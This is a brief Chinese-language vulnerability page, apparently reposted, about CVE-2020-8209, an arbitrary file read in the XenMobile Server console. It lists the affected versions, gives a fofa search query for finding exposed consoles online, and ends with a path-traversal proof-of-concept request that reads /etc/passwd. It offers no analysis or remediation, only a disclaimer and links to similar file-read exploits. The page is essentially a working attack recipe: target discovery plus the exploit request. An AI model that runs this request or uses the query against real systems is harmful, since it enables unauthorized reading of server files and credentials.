0x01 影响版本
RP2之前的XenMobile服务器10.12
RP4之前的XenMobile服务器10.11
RP6之前的XenMobile服务器10.10
10.9 RP5之前的XenMobile服务器
0x02 fofa语法
app="XenMobile-控制台"
应用截图
0x03 POC
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
(CVE-2020-8209)XenMobile-控制台存在任意文件读取漏洞
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。
猜您在找
CVE-2020-3452 CISCO ASA远程任意文件读取漏洞
Rand函数引发的安全问题 —— OSSN任意文件读取漏洞(CVE-2020-10560)
【CVE-2020-1938】Tomcat AJP 任意文件读取和包含漏洞分析记录
Grafana 任意文件读取漏洞(CVE-2021-43798)
【漏洞复现】ThinkAdmin v5和v6 未授权列目录任意文件读取(CVE-2020-25540)
【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞
phpstudy_pro小皮最新版本nginx 默认存在任意文件解析漏洞
Grafana 任意文件读取漏洞 (CVE-2021-43798)学习
CVE-2020-3452 CISCO ASA远程任意文件读取 poc
Atlassian Confluence任意文件读取漏洞